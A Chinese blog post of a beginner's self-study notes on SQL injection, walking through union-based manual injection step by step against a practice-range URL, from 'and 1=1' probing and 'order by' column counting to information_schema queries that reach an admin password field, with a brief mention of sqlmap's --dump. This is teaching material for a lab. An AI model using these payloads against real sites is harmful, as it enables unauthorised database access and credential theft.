[自学笔记] sql注入学习笔记

最新推荐文章于 2024-08-05 23:59:28 发布
最新推荐文章于 2024-08-05 23:59:28 发布
阅读量79 收藏
点赞数 1
分类专栏: web安全 sql注入 文章标签: 笔记 学习 web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39851935/article/details/134654479
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

前言: sql注入的基本原理和自学总结

今天是自学网安第三天, 决定总结一下目前所学, 遂记录, 以备自己查看.
作为新人, 文章不严谨处欢迎指出!

一、sql注入的基本逻辑

sql注入是在存在sql注入漏洞的注入点, 在正常进行数据库的地方加入自己需要的sql指令, 进行数据库查询的操作.

sql注入之所以可以成功, 是因为用户自己也可以查询到数据库, 在进行数据库查询的地方插入自己的指令, 骗服务器查询对应的数据

二、sql注入的基本步骤

///手动注入:

分7步:

  1. 判断可否注入
  2. 判断字段数
  3. 判断显错位
  4. 判断库名
  5. 判断表名
  6. 判断字段(列)名
  7. 查具体数据

1.判断可否注入

一般来说, 进行数据库查询的地方都会带一个"?", 形似
https://www.wuzhuiso.com/s?q=evasion&src=srp&fr=extension_chrome&a=www
其中存在4个可能的注入点, 分别是
q=evasion
src=srp
fr=extension_chrome
a=www
为了方便, 以下使用封神台靶场进行演示
http://pu2lh35s.ia.aqlab.cn/?id=1
这里的id=1就是可能的注入点
我们可以通过经典的and 1=1判断是否可以注入
另外也可以用别的比如sleep(), 只要能发现自己的指令被执行就行

http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=1  #1当然=1, 所以页面正常
http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2  #1不=2, 页面显示异常, 证明and 1=2是可以被服务器执行的, 存在sql注入漏洞

值得注意的是, 有些网站会用引号把请求括起来, 导致指令无法执行, 可以自己使用引号让源码里面的引号闭合

http://pu2lh35s.ia.aqlab.cn/?id=1' and 1=1  #假设这里服务器执行的是select * from maoshe where 'id=1' and 1=1', 我们的指令被括出去了

若被waf防火墙拦截, 可以考虑对指令特殊处理.

2.判断字段数

可以使用order by排序命令判断

http://pu2lh35s.ia.aqlab.cn/?id=1 order by 1  #按第一个字段排序
#...省略
http://pu2lh35s.ia.aqlab.cn/?id=1 order by 3  #因为只有两个字段, 页面异常, 得知字段数=2

因为没有字段3, 所以服务器找不到对应数据.

3.判断显错位

一般使用联合查询union select, 即把两张段的数据拼接在一起显示

http://pu2lh35s.ia.aqlab.cn/?id=1 union select 1,2  #因为之前判断字段数只有2, 所以联合的只能有1,2 不然报错

因为联合查询优先显示前面的, 所以后面要求查询的可能被挤出去, 可以把id=1改成无法显示的, 比如id=100, 或者and 1=2, 也可以用limit x,y (x=下标, y=数量)

这里2显示出来了, 证明"2"处是一个回显点

4.判断库名

既然"2"处可以显示查询内容, 那么可以替换2为database()查询库名

http://pu2lh35s.ia.aqlab.cn/?id=1 union select 1,database()


得知当前库名为maoshe

5.判断表名

查表就不能这么简单粗暴了, 需要去到系统自带库information_schema查询tables表里面的table_name字段

http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema='maoshe'  #在库information_schema中的tables表中查询table_schema为maoshe的table_name


得知该表为admin

6.查询具体数据

知道了库名和表名, 还需要知道自己要查的字段, 就可以查需要的数据了.

http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema='maoshe' and table_name='admin' limit x,1  #x从0开始往后查, 你能看出这段的意义吗?

于是, 我们得知我们要查的是maoshe库下的admin表里的password字段

#请你自己写一个尝试吧!
----

///使用工具注入

常用sqlmap.
sqlmap可以自动检测给定url(-u)或者数据包(-r)(可以用burp抓包)里面的sql漏洞并且利用它们把数据–dump出来, 但是要小心别把自己–dump进监狱.
这里不加介绍, 可以上网查, 有详细手册, 也可以help

备注

这里举例显错注入, 还有其他的注入方式.
查漏洞不用查出具体数据, 证明有这个漏洞就能提交

Tofu707
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL学习笔记
12-22
总的来说,这份"SQL学习笔记"涵盖了从基础到高级的SQL知识,包括数据库管理、查询技巧、函数应用以及事务处理等内容。无论你是刚接触SQL的新手,还是希望巩固提升的开发者,都能从中受益。通过深入学习和实践,你...
Oracle经典自学笔记.docx
11-17
6. **SQL学习重点**:学习SQL时,应该特别关注SELECT语句,它是面试中最常被考察的部分。了解如何使用SELECT语句从表中选择、组合、过滤和排序数据至关重要。此外,理解DML语句(如INSERT、UPDATE、DELETE)的基本...
sql注入一般流程(附例题)
热门推荐
Battery的博客
08-03 13万+
在与服务器数据库进行数据交互的地方拼接了恶意的sql代码,达到欺骗服务器执行恶意代码的目的。本质上是程序把用户输入的数据当成了sql语句执行。
sql注入
qq_49714982的博客
04-06 1645
高版本:在MYSQL5.0以上版本存在一个自带数据库为information_schema,它是一个存储所有数据库名、表名、列名的数据库,相当于可以通过查询它获取指定数据库下面的表名、列名信息。id=1 and 1=2 union select 1,database(),user(),4)union select 1,2,3,4(几个列就写到几,并且让?id=1报错,比如id=-1或者 and 1=2)id=-1 union select 1,group_concat(数据项1),3,4 from。
SQL注入流程
weixin_52180702的博客
06-26 1955
SQL是一门ANSI的标准计算机语言,用来访问和操作数据库数据库软件主要包括SQL server,MySQL,Oracle等数据库软件兼容一些主要的SQL关键词操作。 SQL注入流程。
oracle自学笔记
05-22
Oracle数据库是一种广泛应用于企业和组织的高性能、高可用性的关系型数据库管理系统。...通过深入学习和实践,可以掌握其核心概念和操作,这对于IT从业者尤其是数据库管理员和开发者来说是必不可少的技能。
Oracle学习笔记.pdf
09-11
以下是对Oracle学习笔记中提到的一些关键知识点的详细解释: 1. **SQL执行顺序**: SQL语句的执行顺序是:`FROM` -> `WHERE` -> `SELECT` -> `GROUP BY` -> `HAVING` -> `ORDER BY`。首先从`FROM`子句开始,确定...
十、LVM管理和SSM存储管理器 学习笔记
My online notebook
08-05 281
LVM(Logical Volume Manager)逻辑卷管理,在磁盘分区和文件系统直接,添加一个逻辑管理层,提供一个抽象的盘卷,并建立文件系统。系统管理员利用LVM可以再磁盘不重新分区的情况下动态调整文件系统大小,并利用LVM管理就可以跨越磁盘,添加新的磁盘后,可以通过LVM直接扩容文件系统。LVM常见概念:物理存储介质:可以是磁盘分区、整个磁盘、RAID阵列或者SAN磁盘,必须初始化为LVM物理卷才能与LVM结合使用物理卷PV:LVM的基本存储逻辑块,
Redis应用笔记
qq_40623672的博客
08-04 545
夯实Redis基础以及生产环境应用优化的笔记~
OpenStack Yoga版安装笔记(十二)nova安装(下)
zkyqss的博客
08-03 702
在不支持硬件加速的传统硬件上,可以使用通用的QEMU hypervisor。另外可以通过简单修改这里的配置,增加额外的计算节点,从而水平扩展计算环境。计算服务(Compute Service)支持多种hypervisor来部署实例或虚拟机。为了简化配置,这里使用。在安装和配置compute service之前,需要先创建数据库、服务凭证(用户名/密码)、服务API端点。1、检查计算节点(compute node)是否支持硬件虚拟化,返回1或者大于1,则支持;当您添加新的计算节点时,您必须在控制节点上运行。
第二十一天培训笔记
weixin_70756988的博客
08-05 533
查看数据库,查看表,查看表内容,能够正常查看。1)远程登录前提条件是。
pytorch学习笔记3 tensor索引和切片
Leo@Apas
08-02 326
2 表示 0到2(不包含2), 1:表示 1到末尾, -1表示最后一个元素,-2表示倒数第二个。表示任意都维度(根据原数据shape和给定形式推断),且都是满选。]其实=a[:,1,:,:]=a[:,1]]其实=a[0,:,:,:]=a[0]0:28:2 表示从0到27隔点采样。::2 表示从头到尾隔点采样。上图在0维上取0和2两个元素。
口语笔记——定语从句
最新发布
golfxiao的专栏
08-05 526
she is the girl that sings well. (that == the girl) , 作主语不能省略, 也可以用who,但不能用whom。she is the gril that I like. (that==the girl),也可以用who/whom 引导宾语可省略。注:引导主宾表从句的词叫连词,而在定语从句却叫关系代词,定语从句的引导词与主宾表的引导词有何不同?限定性定语从句: 定语从语,从句不能去掉,否则句子意思就会改变。非限定性定语从句中,如果who作宾语,只能用whom.
C语言零基础学习笔记11——分支和循环(五)
Lbs_gemini0603的博客
08-02 1224
C语言零基础学习笔记11——分支和循环(五)
conda&pytorch环境搭建笔记
golfxiao的专栏
08-01 1050
上面nvcc命令查到的cuda版本是12.0,但pytorch官网没有提供cuda 12.0的可选择版本,保险起见,选择了低于12.0的11.8作为兼容版本安装。每个库都有不同的版本,每个版本都有不同的依赖关系,如果多个项目的python环境混用,很快就会陷入各种库的依赖冲突的泥潭中。
8月2日SpringBoot学习笔记
tcwjy2021的博客
08-02 996
通过通过execution函数来定义切点,注解为@Pointcut("execution()")被定义切点的类之后使用@Autoward注入时会注入此类的代理类(此类的子类,包含代理处理器,处理程序等等),而不是本类,通过动态代理实现。(本人太垃圾了真不懂所以直接看别人的吧)
Spring Cloud 学习笔记三:负载均衡
RHeng的博客
08-05 1274
负载均衡是指将网络请求或网络流量分散到多个服务器或网络节点上,以提高系统的整体处理能力和可用性。在微服务架构中,负载均衡器通常部署在客户端和服务提供者之间,负责将请求智能地分发到各个服务实例上,以确保没有单个服务实例过载,同时最大化资源利用率。Spring Cloud LoadBalancer允许开发者通过实现ReactorLoadBalancer接口来自定义负载均衡策略。开发者可以根据业务需求,编写复杂的负载均衡逻辑,以满足特定的需求。
高翔【自动驾驶与机器人中的SLAM技术】学习笔记(五)卡尔曼滤波器一:认知卡尔曼滤波器;协方差矩阵与方差;
xiaoyaolangwj的博客
08-05 666
卡尔曼滤波器
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值